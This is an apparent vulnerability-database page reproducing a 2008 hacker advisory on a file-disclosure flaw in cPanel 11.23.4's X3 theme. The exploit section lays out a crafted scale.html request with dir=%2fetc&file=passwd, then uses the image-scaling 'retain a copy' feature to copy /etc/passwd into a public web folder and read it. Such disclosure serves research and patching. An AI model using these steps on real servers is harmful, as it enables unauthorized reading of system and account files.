Cpanel X File Disclosure Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052550 漏洞类型
发布时间 2008-08-23 更新时间 2008-08-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008080065
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########  
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ## 
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ## 
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ## 
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ## 
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ## 
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########  
####################################################################################
################################ !R4Q!4N H4CK3R  ###################################
####################################################################################
#
# Cpanel X File Disclosure Vulnerability
# 
#       Tested on cPanel Version 11.23.4-RELEASE
#       other versions might be affected
#
# Founded By : Encrypt3d.M!nd
#              encrypt3d.blogspot.com
#
####################################################################################
# Description :
   
Cpanel X Suffering a File Disclosure Vulnerability wich let the attacker reading files
he has no premission to read it.For Example:/etc/passwd

# Exploit :
You Must have a premission to access the Cpanel.
Login and goto:
 

"site.com:2082/frontend/x3/cpanelpro/scale.html?dir=%2fetc&file=passwd"
for reading /etc/passwd

then click on "Retain a copy of the old image as" and type the path of your account
for Example: "/home/user/public_html/passwd"
Note:passwd is a file not a directory
then click on "Scale Image"
then goto "http://yoursite.com/passwd" by your browser
you will see the /etc/passwd 
 
# End